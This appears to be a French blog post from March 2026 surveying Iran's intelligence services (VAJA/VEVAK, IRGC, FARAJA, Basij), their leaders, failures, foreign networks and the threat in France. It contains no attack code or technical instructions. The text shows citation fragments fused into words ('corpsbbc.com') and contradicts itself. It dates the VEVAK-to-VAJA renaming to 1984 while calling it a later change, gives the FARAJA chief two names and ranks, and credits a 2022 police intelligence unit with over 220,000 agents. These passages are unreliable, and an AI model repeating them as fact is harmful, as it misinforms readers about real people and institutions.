par Aics-sr | Mar 25, 2026 | Moments d'histoire
Les services de renseignement iraniens
Organigramme et principaux services
Les services de renseignement iraniens sont structurés autour de plusieurs entités clés, souvent en concurrence ou en chevauchement, sous la supervision directe du Guide suprême, Ali Khamenei (jusqu’à sa mort début mars 2026) :
- Ministère du Renseignement (VAJA/VEVAK) :
- Rôle : Principal service de renseignement civil, chargé de la sécurité intérieure et extérieure, de la lutte contre l’opposition, et des opérations à l’étranger.
- Dirigeant : Le ministre du Renseignement est nommé par le président iranien, mais le service est directement contrôlé par le Guide suprême.
- Effectifs : Bien financé et équipé, il est considéré comme l’un des piliers de l’appareil sécuritaire iranien.
- Départements clés : Renseignement intérieur, renseignement extérieur, contre-espionnage, cyber.
- Personnalités clés éliminées en 2026 : Seyed Yahya Hamidi (vice-ministre chargé des affaires israéliennes) et Jalal Pour Hossein (chef du département d’espionnage), tués lors de frappes israéliennes début mars 2026.
- Corps des Gardiens de la révolution islamique (CGRI) – Direction du renseignement :
- Rôle : Renseignement militaire, opérations spéciales, soutien aux proxys régionaux (Hezbollah, Houthis, milices irakiennes).
- Dirigeant : Saleh Asadi (chef de la direction du renseignement du CGRI en 2026).
- Effectifs : Intégré aux forces armées, avec des unités dédiées à l’espionnage et aux opérations clandestines.
- Organisation du renseignement de la police (FARAJA) :
- Rôle : Renseignement policier, surveillance de la dissidence intérieure.
- Dirigeant : Général de brigade Gholamreza Reza’ian.
- Centre de protection et de renseignement du pouvoir judiciaire :
- Rôle : Enquête sur les affaires sensibles, souvent utilisé pour réprimer l’opposition.
- Dirigeant : Ali Abdollahi.
- Conseil de coordination du renseignement :
- Rôle : Coordination entre les différents services, créé pour centraliser le contrôle après des échecs opérationnels majeurs.
- Contexte : Ali Khamenei a cherché à renforcer ce conseil pour pallier la perte de confiance dans le commandement militaire traditionnel.
- Défis majeurs en 2026
- Crise de confiance et centralisation : Après des échecs répétés (notamment pendant la guerre de 2025-2026 et la perte de hauts responsables), le régime a tenté de centraliser le contrôle via un nouveau « Conseil de défense », intégrant des agents loyaux à tous les niveaux.
- Pénétration étrangère : Les services israéliens et américains ont réussi à infiltrer les communications et à cibler des hauts responsables, notamment via le suivi des déplacements et des gardes du corpsbbc.com.
- Répression interne : Les services sont critiqués pour leur incapacité à endiguer les protestations internes et la montée de l’opposition organisée (ex : Organisation des Moudjahidine du peuple d’Iran).
- Guerre technologique : L’Iran a subi des cyberattaques et des infiltrations de ses systèmes de télécommunications, affaiblissant sa capacité à protéger ses secretsbbc.com.
- Perte de dirigeants clés : L’élimination de plusieurs hauts responsables (dont Hamidi et Pour Hossein) a porté un coup sévère à la capacité opérationnelle du ministère du Renseignement.
Échecs récents
- Opérations extérieures : Échec à prévenir les frappes israéliennes et américaines de février-mars 2026, qui ont ciblé des sites stratégiques et des dirigeants à Téhéran.
- Programme nucléaire : Incapacité à protéger les scientifiques et infrastructures liées au nucléaire, ciblés par des assassinats et des sabotagesbbc.com.
- Lutte contre l’opposition : Malgré la création de nouveaux organes (comme FARAJA), le régime peine à contrer l’opposition intérieure et extérieure.
- Crise de légitimité : La multiplication des services parallèles (VAJA, FARAJA, CGRI, pouvoir judiciaire) a créé des rivalités et des failles exploitables par les ennemis du régime.
- Dynamique post-Khamenei (mars 2026)
- Succession : La mort de Khamenei a créé un vide temporaire, mais les institutions (Gardiens de la Constitution, Conseil de coordination) continuent de fonctionner de manière autonomepublicsenat.fr.
- Menace persistante : Malgré les pertes, l’appareil sécuritaire reste actif, avec une base large et des structures indépendantes les unes des autrespublicsenat.fr.
Le VAJA (Ministère du Renseignement iranien) en mars 2026, synthétisant sa structure, ses missions, ses dirigeants, ses échecs récents et ses défis actuels :
- Présentation générale
- Nom officiel : Ministère du Renseignement de la république islamique d’Iran (VAJA), anciennement VEVAK.
- Statut : Principal service de renseignement civil, membre du Conseil de coordination du renseignement iranien.
- Autorité : Placé sous l’autorité directe du Guide suprême (Ali Khamenei jusqu’en mars 2026), le ministre doit être un mujtahid (expert en loi islamique).
- Budget et moyens : Particulièrement bien financé et équipé, il est considéré comme le bras armé de la politique étrangère iranienne, avec des moyens supérieurs à ceux des autres ministères.
- Historique et évolution
- Création : Fondé en 1984 pour remplacer la SAVAK (police secrète du Shah), avec une rupture idéologique mais une continuité opérationnelle (personnel expérimenté conservé).
- Rôle initial : Lutte contre l’opposition intérieure et extérieure, infiltration des groupes dissidents, soutien aux proxys régionaux (Hezbollah, milices irakiennes).
- Réorganisation récente : Le VAJA a subi des réformes structurelles après des échecs majeurs, notamment pendant la guerre de 2025-2026, avec une centralisation accrue sous l’égide du Guide suprême.
- Dirigeants clés (2021–2026)
- Ministre actuel (depuis 2021) : Esmaïl Khatib, nommé par le président Ebrahim Raïssi.
- Ancien ministre notable : Mahmoud Alavi (2013–2021), sous la présidence de Hassan Rouhani.
- Vice-ministres ciblés en 2026 :
- Seyed Yahya Hamidi : Vice-ministre chargé des affaires israéliennes, responsable d’attaques terroristes contre des cibles juives et occidentales. Éliminé par une frappe israélienne le 1er mars 2026.
- Jalal Pour Hossein : Chef du département d’espionnage, également tué en mars 2026. Il supervisait les opérations de répression interne et les activités terroristes à l’étranger.
- Missions principales
- Sécurité intérieure : Surveillance et répression des opposants, contrôle des manifestations, arrestations arbitraires (sous prétexte d’« espionnage » ou d’« infiltration »).
- Opérations extérieures : Assassinats ciblés d’opposants, soutien logistique et financier au Hezbollah et à d’autres groupes mandataires.
- Cybersurveillance : Infiltration des communications et des réseaux sociaux pour traquer la dissidence.
- Coordination avec le CGRI : Collaboration étroite avec les Gardiens de la révolution pour les opérations à l’étranger et la répression interne.
- Structure interne
- Directions clés :
- Renseignement intérieur : Surveillance des citoyens, infiltration des mouvements sociaux.
- Renseignement extérieur : Opérations clandestines en Europe, au Moyen-Orient, et en Asie.
- Contre-espionnage : Lutte contre les services étrangers (CIA, Mossad, MI6).
- Cyberunité : Développement de capacités offensives et défensives en cybersécurité.
- Unités spéciales : Escadrons pénitentiaires et groupes d’intervention rapide pour la répression violente (torture, disparitions forcées).
- Échecs et défis en 2026
- Pénétration étrangère : Le VAJA a échoué à protéger ses dirigeants et ses infrastructures contre les frappes israéliennes et américaines, notamment l’élimination de Hamidi et Pour Hossein, qui a « porté un coup sévère » à ses capacités opérationnelles.
- Crise de confiance : Ali Khamenei a perdu confiance dans le commandement traditionnel, conduisant à la création d’un « Conseil de défense » pour centraliser le contrôle et intégrer des agents loyaux à tous les niveaux.
- Répression inefficace : Malgré la violence accrue (arrestations massives, exécutions expéditives), le régime peine à endiguer la colère populaire et l’opposition organisée.
- Guerre technologique : Incapacité à contrer les cyberattaques et les infiltrations de ses systèmes de communication, exploitées pour cibler ses dirigeants.
- Rivalités internes : Conflits avec d’autres services (CGRI, FARAJA) et manque de coordination, affaiblissant la réponse aux menaces extérieures.
- Stratégies récentes
- Centralisation : Intégration du VAJA dans un nouveau « Conseil de défense » pour unifier la chaîne de commandement, mais cette mesure est perçue comme une manœuvre de survie plutôt qu’une réforme structurelle.
- Recyclage des élites : Retour de figures comme Ali Larijani (ancien secrétaire du Conseil suprême de sécurité nationale) pour combler le vide laissé par les pertes humaines.
- Ciblage des opposants : Renforcement des opérations contre les Moudjahidine du peuple d’Iran (OMPI) et les binationaux accusés d’espionnage, souvent sans preuve.
- Conséquences des frappes de mars 2026
- Perte de capacités : La destruction partielle du siège du VAJA à Téhéran et la mort de hauts responsables ont réduit sa capacité à mener des attaques terroristes et à surveiller les opposants.
- Documentation saisie : Tsahal a révélé avoir trouvé des preuves de la collaboration entre le VAJA, le Hezbollah, le Hamas et le CGRI pour créer une « salle d’opérations conjointe » à Gaza, confirmant son rôle central dans la coordination des proxys régionaux.
- Perspectives
- Survie du régime : Le VAJA reste un pilier de la répression, mais son efficacité est remise en question par les échecs répétés et la pression internationale.
- Adaptation : Le service pourrait se recentrer sur la cybersécurité et les opérations clandestines, tout en renforçant sa collaboration avec la Russie et la Chine pour contourner les sanctions et les pressions occidentales.
Le VEVAK (Vezārat-e Ettelā’at va Amniat-e Keshvar) est l’ancien nom du VAJA, le ministère du Renseignement iranien. Voici une analyse détaillée de son histoire, de sa structure, de ses méthodes et de son évolution jusqu’à sa transformation en VAJA, avec un focus sur ses spécificités et ses héritages en 2026 :
- Origines et création
- Contexte : Créé en 1984 pour remplacer la SAVAK (police secrète du Shah), dissoute après la révolution islamique de 1979.
- Objectif initial : Éliminer toute trace de l’ancien régime et établir un service de renseignement loyal à la République islamique, sous le contrôle direct de l’ayatollah Khomeini, puis de son successeur, Ali Khamenei.
- Base idéologique : Contrairement à la SAVAK, le VEVAK a été conçu comme un outil au service de l’islam politique, avec une mission explicite de défendre la révolution et d’exporter l’idéologie chiite.
- Continuité opérationnelle : Malgré la purge initiale des anciens agents de la SAVAK, une partie du personnel expérimenté a été conservée pour son expertise, notamment dans la surveillance et l’infiltration des groupes opposants (marxistes, libéraux, kurdes, etc.).
Structure et organisation
Dirigeants historiques
| Période |
Ministre du Renseignement |
Contexte politique |
| 1984–1989 |
Mohammad Reyshahri |
Première phase de consolidation |
| 1989–1997 |
Ali Fallahian |
Période de radicalisation |
| 1997–2000 |
Ghorbanali Dorri-Najafabadi |
Réformes limitées sous Khatami |
| 2000–2005 |
Ali Younesi |
Ouverture relative, puis recentralisation |
| 2005–2009 |
Gholam Hossein Mohseni-Ejehei |
Renforcement de la répression |
| 2009–2013 |
Heydar Moslehi |
Crise post-élection de 2009 |
| 2013–2021 |
Mahmoud Alavi |
Modernisation et cyberespionnage |
| Depuis 2021 |
Esmaïl Khatib |
Centralisation et répression accrue |
Directions clés
- Renseignement intérieur : Surveillance des citoyens, infiltration des universités, des syndicats et des minorités ethniques.
- Renseignement extérieur : Opérations en Irak, Liban, Afghanistan, et en Europe (assassinats ciblés, soutien au Hezbollah).
- Contre-espionnage : Lutte contre les services étrangers, notamment la CIA et le Mossad.
- Unité spéciale : Escadrons chargés des interrogatoires musclés, des enlèvements et des liquidations d’opposants à l’étranger.
- Méthodes et pratiques
Répression intérieure
- Surveillance de masse : Utilisation de réseaux d’informateurs dans les mosquées, les administrations et les entreprises.
- Arrestations arbitraires : Ciblage des intellectuels, journalistes, avocats et militants des droits de l’homme.
- Torture et disparitions : Centres secrets de détention, où les prisonniers subissent des pressions psychologiques et physiques.
- Procès-spectacles : Condamnations rapides et exécutions pour « corruption sur Terre » ou « ennemi de Dieu » (moharebeh).
Opérations extérieures
- Assassinats ciblés :
- Exemple emblématique : Meurtres de dissidents iraniens en Europe (ex : assassinat de quatre opposants kurdes au restaurant Mykonos à Berlin en 1992, attribué au VEVAK).
- Cibles : Ancien Premier ministre Shapour Bakhtiar (1991, Paris), opposants des Moudjahidine du peuple (OMPI).
- Soutien aux proxys : Formation et financement du Hezbollah, des milices chiites en Irak, et des groupes armés en Syrie et au Yémen.
- Cyberespionnage : Développement de capacités de piratage pour surveiller les communications des opposants et des gouvernements étrangers.
Collaboration internationale
- Avec la Russie et la Chine : Échanges de technologies de surveillance et de répression.
- Avec la Syrie et le Hezbollah : Coordination des opérations au Liban et en Syrie, notamment pendant la guerre civile syrienne.
- Échecs et controverses
- Affaire Mykonos (1992) : Condamnation internationale de l’Iran après l’assassinat de quatre opposants kurdes en Allemagne, entraînant une crise diplomatique avec l’UE.
- Scandales internes :
- Affaire des « tueurs en série » (années 1990) : Liquidation d’intellectuels et d’écrivains critiques par des agents du VEVAK, révélée en 1998.
- Crise de 2009 : Le VEVAK a échoué à anticiper les manifestations massives post-électorales, révélant des failles dans son renseignement intérieur.
- Sanctions internationales : Le VEVAK (puis VAJA) est sous sanctions américaines et européennes pour violations des droits de l’homme et soutien au terrorisme.
- Évolution vers le VAJA
- Changement de nom : Le VEVAK est officiellement devenu le VAJA (Ministère du Renseignement) en 1984, mais le terme VEVAK reste utilisé dans les médias et les rapports de renseignement pour désigner ses activités les plus controversées.
- Modernisation :
- Cybersécurité : Création d’unités dédiées aux cyberattaques et à la désinformation (ex : campagne d’influence pendant les élections américaines).
- Lutte contre les réseaux sociaux : Déploiement de logiciels espions (comme « Cobra ») pour traquer les dissidents sur Telegram, Instagram et Twitter.
- Centralisation : Sous Esmaïl Khatib (depuis 2021), le VAJA a renforcé son contrôle sur les autres services (CGRI, FARAJA) pour éviter les rivalités et les fuites.
- Héritage du VEVAK en 2026
- Culture de la paranoïa : Le VEVAK a instauré une méfiance systématique au sein de l’appareil d’État, avec des purges régulières pour éliminer les « éléments peu fiables ».
- Réseaux à l’étranger : Malgré les coups portés par les frappes israéliennes et américaines (mars 2026), ses cellules dormantes en Europe et au Moyen-Orient restent actives.
- Répression technologique : Utilisation de l’IA et de la reconnaissance faciale pour traquer les opposants, même à l’étranger.
- Résilience : Malgré la perte de dirigeants clés (comme Seyed Yahya Hamidi en 2026), le VAJA conserve une structure décentralisée, lui permettant de continuer ses opérations.
- Défis actuels (2026)
- Pénétration par les services étrangers : Le Mossad et la CIA ont réussi à infiltrer ses rangs, comme en témoignent les assassinats ciblés de ses hauts responsables.
- Crise de légitimité : La population iranienne, lasse de la répression et des pénuries, conteste de plus en plus son autorité.
- Guerre de l’information : Le VAJA peine à contrer les campagnes de désinformation menées par l’opposition (notamment le CNRI) et les médias occidentaux.
- Comparaison VEVAK vs VAJA
| Aspect |
VEVAK (années 1980–2000) |
VAJA (2020–2026) |
| Cible principale |
Opposants politiques et intellectuels |
Cyberdissidents et réseaux sociaux |
| Méthodes |
Assassinats physiques, torture |
Cyberattaques, surveillance numérique |
| Portée géographique |
Moyen-Orient, Europe |
Mondiale (Amérique, Asie) |
| Collaboration |
Hezbollah, Syrie |
Russie, Chine, milices irakiennes |
| Faiblesses |
Rivalités internes, corruption |
Pénétration étrangère, fuite des cerveaux |
Le Corps des Gardiens de la révolution islamique (CGRI) en mars 2026, couvrant son organigramme, ses dirigeants, ses unités, ses défis et ses échecs récents :
- Présentation générale
- Nom officiel : Corps des Gardiens de la révolution islamique (CGRI), ou Pasdaran.
- Statut : Organisation paramilitaire et militaire d’élite, dépendant directement du Guide suprême. Contrairement à l’armée régulière (Artesh), le CGRI a pour mission de protéger le système de la République islamique et d’exporter l’idéologie révolutionnaire chiite.
- Classement : Considéré comme une organisation terroriste par les États-Unis (2019), le Canada (2024), et l’Union européenne (janvier 2026).
- Structure et organigramme (2026)
Commandement
- Commandant en chef : Général Ahmad Vahidi (nommé en mars 2026), succédant au général Mohammad Pakpour, tué lors des frappes américano-israéliennes de février 2026.
- Autorité suprême : Le Guide suprême (Ali Khamenei jusqu’en mars 2026) est le commandant en chef des forces armées, y compris du CGRIsenat.fr.
Principales unités
- Force Al-Qods : Unité d’élite chargée des opérations extérieures (soutien au Hezbollah, aux milices irakiennes, aux Houthis yéménites, et aux groupes syriens). Elle est responsable de la planification et de l’exécution d’opérations terroristes à l’étranger.
- Force terrestre : Déploiement interne pour la répression des manifestations et la sécurité des sites stratégiques.
- Force aérospatiale : Gestion des missiles balistiques et des drones, utilisés pour des frappes régionales et contre les bases américaines et israéliennes.
- Force navale : Contrôle du détroit d’Ormuz et opérations de harcèlement maritime.
- Basij : Milice populaire mobilisable pour la répression intérieure et la guerre asymétrique.
- Direction du renseignement : Collaboration étroite avec le VAJA pour la surveillance et les opérations clandestines.
Missions et rôles
- Protection du régime : Lutte contre les coups d’État, répression des opposants, et maintien de l’ordre idéologique.
- Projection de puissance : Soutien aux proxys régionaux (Hezbollah, Houthis, milices irakiennes) et export de la révolution islamique.
- Développement militaire : Gestion des programmes de missiles balistiques et de drones, en dépit des sanctions internationales.
- Économie parallèle : Contrôle d’entreprises dans les secteurs pétrolier, de la construction et des télécommunications, représentant environ 30 % de l’économie iranienne.
- Dirigeants clés et évolutions récentes
- Ahmad Vahidi (2026–) : Ancien ministre de la Défense, connu pour son rôle dans les attentats contre des cibles israéliennes et américaines. Sa nomination intervient dans un contexte de crise après la mort de plusieurs hauts responsables.
- Qassem Soleimani (assassiné en 2020) : Ancien chef de la Force Al-Qods, remplacé par Esmail Ghaani, puis par des commandants moins charismatiques, affaiblissant temporairement l’unité.
- Mohammad Pakpour (tué en 2026) : Son élimination a révélé des failles dans la protection des dirigeants du CGRI.
- Défis majeurs en 2026
Pertes humaines et leadership
- Frappe américano-israélienne (février–mars 2026) : Plusieurs généraux et commandants de la Force Al-Qods ont été tués, dont des figures clés de la coordination avec le Hezbollah et le Hamas. Ces pertes ont perturbé la chaîne de commandement et réduit la capacité opérationnelle du CGRI.
Crise de légitimité et rivalités internes
- Transition post-Khamenei : La mort du Guide suprême a créé des tensions au sein de l’establishment iranien. Le CGRI, bien que fidèle au système, pourrait chercher à renforcer son influence face au Conseil de direction provisoire
- Conflits avec d’autres services : Rivalités avec le VAJA et l’armée régulière (Artesh) pour le contrôle des ressources et des opérations extérieures.
Échecs opérationnels
- Répression des manifestations : Malgré sa brutalité, le CGRI n’a pas réussi à endiguer la colère populaire, notamment après les manifestations de janvier 2026.
- Guerre technologique : Incapacité à protéger ses infrastructures contre les cyberattaques et les frappes ciblées sur ses bases et dépôts de missiles.
- Sanctions et isolement : L’inscription du CGRI sur les listes terroristes internationales limite ses mouvements financiers et logistiques.
Réponse aux attaques extérieures
- Riposte limitée : Malgré des tirs de missiles vers Chypre et Israël, le CGRI n’a pas pu infliger de dégâts stratégiques à ses ennemis, révélant des lacunes dans sa doctrine de dissuasion.
- Échecs récents
- Perte de dirigeants : L’élimination de commandants expérimentés a affaibli la planification et l’exécution des opérations.
- Incapacité à protéger le territoire : Les frappes ennemies ont ciblé des sites sensibles, dont des bases de missiles et des centres de commandement, sans réponse efficace.
- Crise économique : Les sanctions et la corruption interne ont réduit les ressources disponibles pour les opérations et le recrutement.
- Stratégies d’adaptation
- Recentrage sur la dissuasion : Le CGRI mise sur ses missiles balistiques et ses drones pour compenser ses faiblesses aériennes et navales.
- Renforcement des proxys : Accélération du soutien aux milices régionales pour mener des attaques par procuration (ex : frappes de drones contre l’Arabie saoudite et les Émirats).
- Propagande et mobilisation : Utilisation des médias et des milices Basij pour maintenir la pression intérieure et extérieure.
- Perspectives
- Résilience : Malgré les coups subis, le CGRI reste un acteur clé de la sécurité iranienne, grâce à son ancrage idéologique et économique.
- Risque de radicalisation : La perte de modérés au profit de factions plus dures pourrait entraîner une escalade des attaques terroristes.
- Dépendance accrue à la Russie et à la Chine : Pour contourner les sanctions et moderniser son arsenal.
L’Organisation de renseignement de la police iranienne (FARAJA) en mars 2026, couvrant son organigramme, ses dirigeants, ses missions, ses défis et ses échecs récents :
- Présentation générale
- Nom officiel : Organisation de renseignement de la police (FARAJA), intégrée au Commandement de la police de la République islamique d’Iran (NAJA).
- Statut : Service de renseignement parallèle, créé en 2022 par une réorganisation des forces de police iraniennes. Il opère sous la supervision directe du commandement de la police, lui-même contrôlé par le Guide suprême.
- Dirigeant : Jusqu’en mars 2026, le lieutenant-général Gholam Reza Rezayan dirigeait l’organisation, avant d’être tué lors des frappes américano-israéliennes.
- Structure et organigramme
Intégration dans l’appareil sécuritaire
- La FARAJA est l’un des quatre principaux services de renseignement iraniens, aux côtés du VAJA (Ministère du Renseignement), du CGRI (renseignement des Gardiens de la révolution) et du renseignement du pouvoir judiciaire.
- Elle est divisée en deux sections principales :
- Organisation du renseignement : Chargée de la collecte d’informations, de la surveillance et des opérations clandestines.
- Police de la sécurité publique : Responsable du maintien de l’ordre, de la répression des émeutes et des activités antiterroristes.
Effectifs et moyens
- Plus de 220 000 agents déployés à travers le pays, avec des unités spécialisées dans la répression des manifestations, la lutte contre le trafic de stupéfiants et le contre-terrorisme.
- Collaboration étroite avec les Basij (milice populaire) et le VAJA pour les opérations de sécurité intérieure.
- Missions principales
- Sécurité intérieure :
- Surveillance des opposants politiques, des militants et des minorités ethniques.
- Répression des manifestations (usage excessif de la force, arrestations arbitraires, torture).
- Contrôle des frontières et lutte contre le trafic de drogue.
- Renseignement politique :
- Infiltration des mouvements sociaux, des universités et des syndicats.
- Patrouilles incognito et surveillance des rassemblements publics, notamment lors des élections.
- Lutte contre le terrorisme :
- Coordination avec le VAJA et le CGRI pour traquer les groupes armés et les cellules dormantes.
- Soutien au régime :
- Protection des institutions clés et des responsables politiques.
- Participation aux opérations de désinformation et de propagande.
- Dirigeants et évolutions récentes
- Gholam Reza Rezayan (jusqu’en mars 2026) : Chef de la FARAJA, tué lors des frappes ennemies. Son élimination a créé un vide temporaire dans la chaîne de commandement.
- Mohammad Ali Nourinejad : Coordinateur adjoint, impliqué dans la restructuration de la FARAJA en 2022–2023.
- Qasem Rezaee : Chef des gardes-frontières, responsable des opérations de défense urbaine et de la libération d’otages
- Défis majeurs en 2026
Pertes humaines et crise de leadership
- La mort de Rezayan a affaibli la capacité opérationnelle de la FARAJA, déjà critiquée pour son manque de coordination avec les autres services.
Échecs dans la répression
- Manifestations de 2025–2026 : Malgré des moyens importants, la FARAJA n’a pas réussi à endiguer les soulèvements populaires, révélant des failles dans sa stratégie de répression.
- Violations des droits humains : Les méthodes brutales (torture, détentions arbitraires) ont alimenté la colère de la population et attiré des sanctions internationales.
Rivalités internes
- Conflits avec le VAJA et le CGRI : La multiplication des services de renseignement a créé des chevauchements et des rivalités, affaiblissant l’efficacité globale de l’appareil sécuritaire.
- Manque de moyens technologiques : Malgré des effectifs importants, la FARAJA reste en retard en matière de cybersurveillance et de renseignement technique par rapport au VAJA ou au CGRI.
Infiltration par les services étrangers
- Des rapports indiquent que des agents étrangers (CIA, Mossad) ont réussi à pénétrer ses rangs, compromettant ses opérations.
- Échecs récents
- Répression inefficace : Incapacité à prévenir les manifestations massives et à identifier les leaders de l’opposition.
- Perte de crédibilité : Les erreurs commises lors des crises (ex : gestion des élections de 2024) ont discrédité la police aux yeux de la population
- Cible des frappes ennemies : La FARAJA a été directement visée lors des attaques de mars 2026, révélant sa vulnérabilité face aux opérations extérieures.
- Stratégies d’adaptation
- Renforcement des patrouilles : Déploiement accru d’agents en civil pour surveiller les zones sensibles.
- Collaboration avec les Basij : Utilisation des milices pour compenser le manque de personnel formé.
- Modernisation limitée : Tentatives d’améliorer ses capacités de renseignement technique, mais freinées par les sanctions et le manque de ressources.
- Perspectives
- Recentrage sur la répression : La FARAJA devrait continuer à jouer un rôle clé dans la surveillance intérieure, mais son efficacité dépendra de sa capacité à se reformer et à éviter les purges internes.
- Dépendance accrue au VAJA : Face à ses faiblesses, elle pourrait être progressivement marginalisée au profit du ministère du Renseignement.
Les liens entre la FARAJA (Organisation de renseignement de la police iranienne) et les Basij (milice populaire iranienne) sont structurels, opérationnels et idéologiques. Voici une analyse détaillée de cette collaboration en 2026 :
- Cadre institutionnel
- Intégration hiérarchique :
- Les Basij sont officiellement une branche des Gardiens de la révolution (CGRI), mais ils collaborent étroitement avec la FARAJA pour les opérations de sécurité intérieure, notamment la répression des manifestations et la surveillance des opposants.
- En pratique, les Basij agissent souvent comme une force auxiliaire de la police, surtout lors des crises (émeutes, élections, grèves).
- Commandement unifié :
- En cas de soulèvement ou d’urgence, les Basij sont placés sous le commandement opérationnel conjoint de la FARAJA et du CGRI, sur ordre du Guide suprême.
- Rôles complémentaires
| FARAJA |
Basij |
| Renseignement, arrestations ciblées |
Répression de masse, intimidation |
| Surveillance des rassemblements |
Patrouilles de quartier, contrôle social |
| Lutte contre le crime organisé |
Application des normes islamiques |
| Coordination avec le VAJA |
Mobilisation rapide (réservistes) |
- Méthodes de collaboration
- Patrouilles mixtes :
- Des unités combinées FARAJA-Basij sont déployées dans les zones sensibles (universités, places publiques, quartiers pauvres).
- Les Basij, souvent en civil, repèrent les « éléments subversifs », que la FARAJA arrête ensuite.
- Centres de détention :
- Les personnes arrêtées par les Basij sont fréquemment transférées aux commissariats de la FARAJA pour interrogatoire.
- Les Basij participent aussi à la torture et aux interrogatoires musclés dans les centres de police.
- Renseignement participatif :
- Les Basij, ancrés dans les quartiers, fournissent à la FARAJA des informations sur les activités « suspicieuses » (réunions privées, usage de réseaux sociaux critiques, etc.).
- La FARAJA forme les Basij aux techniques de surveillance de base (repérage, filature).
- Avantages pour le régime
- Flexibilité :
- Les Basij permettent à la FARAJA de déléguer les tâches les plus brutales (violence physique, intimidation) tout en gardant une distance institutionnelle.
- Leur statut de milice évite à la police d’assumer seule la responsabilité des exactions.
- Mobilisation massive :
- Les Basij peuvent être mobilisés en quelques heures (ex : 50 000 miliciens déployés à Téhéran en 2025), ce que la FARAJA ne peut pas faire avec ses effectifs limités.
- Légitimité idéologique :
- Les Basij, présentés comme des « volontaires révolutionnaires », donnent une couverture religieuse et populaire à la répression policière.
- Exemples récents (2024–2026)
- Élections de 2024 :
- La FARAJA a coordonné les patrouilles des Basij pour « sécuriser » les bureaux de vote et intimider les électeurs opposants.
- Répression des manifestations :
- À Chiraz et Téhéran, les Basij ont utilisé des motos et des matraques pour disperser les foules, tandis que la FARAJA procédait aux arrestations.
- Contrôle des universités :
- Les Basij infiltrent les campus (sous couvert d’ »associations étudiantes islamiques ») et transmettent les informations à la FARAJA pour cibler les militants.
- Défis et tensions
- Manque de professionnalisme :
- Les Basij, peu formés, commettent souvent des violences non contrôlées, ce qui complique le travail de la FARAJA (risque de scandales, sanctions internationales).
- Rivalités locales :
- Dans certaines villes, les commandants de la FARAJA et des Basij se disputent le contrôle des opérations, créant des failles sécuritaires.
- Crise de recrutement :
- Les Basij peinent à recruter des jeunes, en raison de leur impopularité. La FARAJA doit parfois combler les vides opérationnels.
- Perspectives (2026)
- Renforcement des liens :
- Le régime pourrait fusionner certaines unités des Basij avec la FARAJA pour améliorer la coordination, surtout si les protestations persistent.
- Automatisation :
- La FARAJA teste des outils de surveillance électronique (reconnaissance faciale) pour guider les Basij vers les cibles, réduisant ainsi les erreurs humaines.
En 2026, les services secrets iraniens (principalement le VAJA/VEVAK et la Force Al-Qods du CGRI) sont implantés dans au moins 30 à 40 pays, avec une présence particulièrement marquée en Europe, au Moyen-Orient, en Asie et en Amérique latine. Voici une synthèse des informations disponibles :
- Implantations confirmées et activités clés
- Europe :
- Allemagne : Le VAJA et la Force Al-Qods y mènent des opérations d’espionnage contre les dissidents iraniens et les cibles (pro-)israéliennes. En 2023, l’Office fédéral allemand pour la protection de la Constitution a identifié 160 personnes liées au CGRI en Allemagne.
- France, Belgique, Pays-Bas, Autriche, Suisse : Surveillance de la diaspora iranienne, complots terroristes (ex : attentat déjoué près de Paris en 2018), et infiltration des communautés opposantes.
- Italie, Espagne, Suède, Danemark : Activités de renseignement et tentatives d’assassinats ciblés (ex : meurtre d’un dissident en Turquie coordonné depuis l’Europe).
- Moyen-Orient :
- Irak, Syrie, Liban, Yémen : Le CGRI y déploie des agents via ses proxys (Hezbollah, milices chiites) pour des opérations militaires et de renseignement.
- Arabie saoudite, Émirats arabes unis, Israël : Cyberespionnage, sabotage et soutien aux groupes armés.
- Asie :
- Turquie, Pakistan, Afghanistan, Inde : Le VAJA y coordonne des réseaux de recrutement et de logistique, notamment pour cibler les opposants et les services étrangers.
- Chine et Russie : Collaboration en matière de cybersécurité et d’échange de technologies de surveillance.
- Amérique latine :
- Venezuela, Argentine, Brésil : Le CGRI y utilise des ambassades et des entreprises écrans pour financer des opérations et contourner les sanctions.
- Amérique du Nord :
- États-Unis et Canada : Surveillance des communautés iraniennes et tentatives d’influence politique, malgré les sanctions.
- Afrique :
- Sénégal, Kenya, Afrique du Sud : Présence via des centres culturels et des entreprises pour des activités de renseignement et de contrebande.
- Océanie :
- Australie : Espionnage des dissidents et des institutions juives.
- Méthodes d’implantation
- Ambassades et consulats : Utilisés comme couvertures pour les agents du VAJA et du CGRI (ex : consulat iranien en Turquie impliqué dans des assassinats).
- Entreprises et ONG : Sociétés écrans et associations culturelles servent de façades pour le financement et la logistique.
- Réseaux religieux : Mosquées et centres chiites sont infiltrés pour recruter et surveiller.
- Cyberopérations : Attaques contre les infrastructures critiques et campagnes de désinformation.
- Chiffres et estimations
- VAJA (Ministère du Renseignement) :
- Environ 30 000 agents en Iran et à l’étranger, avec des cellules actives dans plus de 30 pays.
- La Force Al-Qods (CGRI) opère dans au moins 20 pays, avec un focus sur le Moyen-Orient et l’Europe.
- FARAJA (renseignement policier) : Principalement active en Iran, mais collabore avec le VAJA et le CGRI pour des opérations transnationales (ex : surveillance des opposants en Turquie et en Irak).
- Menaces et réactions internationales
- L’Union européenne et les États-Unis considèrent le VAJA et le CGRI comme des menaces majeures, notamment pour leurs activités terroristes et leur espionnage contre les dissidents.
- 10 pays (dont Israël, les États-Unis, l’Arabie saoudite et plusieurs États européens) sont explicitement cités par le CGRI comme cibles ou adversaires dans leurs opérations de contre-espionnage.
- Carte des implantations (exemples)
| Région |
Pays clés (présence confirmée) |
Activités principales |
| Europe |
Allemagne, France, Belgique, Autriche, Suisse |
Espionnage, assassinats, lobbying |
| Moyen-Orient |
Irak, Syrie, Liban, Yémen, Arabie saoudite |
Soutien aux milices, sabotage, cyberattaques |
| Asie |
Turquie, Pakistan, Afghanistan, Inde, Chine |
Réseaux logistiques, recrutement, contrebande |
| Amérique latine |
Venezuela, Argentine, Brésil |
Contournement des sanctions, finance illicite |
| Afrique |
Sénégal, Kenya, Afrique du Sud |
Renseignement, trafic d’armes |
| Amérique du Nord |
États-Unis, Canada |
Surveillance, influence politique |
En France, en mars 2026, les services de renseignement iraniens (VAJA et CGRI) représentent une menace réelle mais ciblée, principalement pour trois raisons :
- Cibles prioritaires : les opposants iraniens en exil
- Menace directe : Les services français craignent des actions violentes (attentats, enlèvements, assassinats) contre les membres de l’opposition iranienne réfugiés en France, notamment ceux liés au Conseil national de la résistance iranienne (CNRI).
- Précédent : En 2018, un complot à la bombe visant un rassemblement du CNRI à Villepinte (près de Paris) avait été déjoué. L’opération avait été orchestrée par un diplomate du VAJA basé à Vienne, avec un réseau d’agents en Europe.
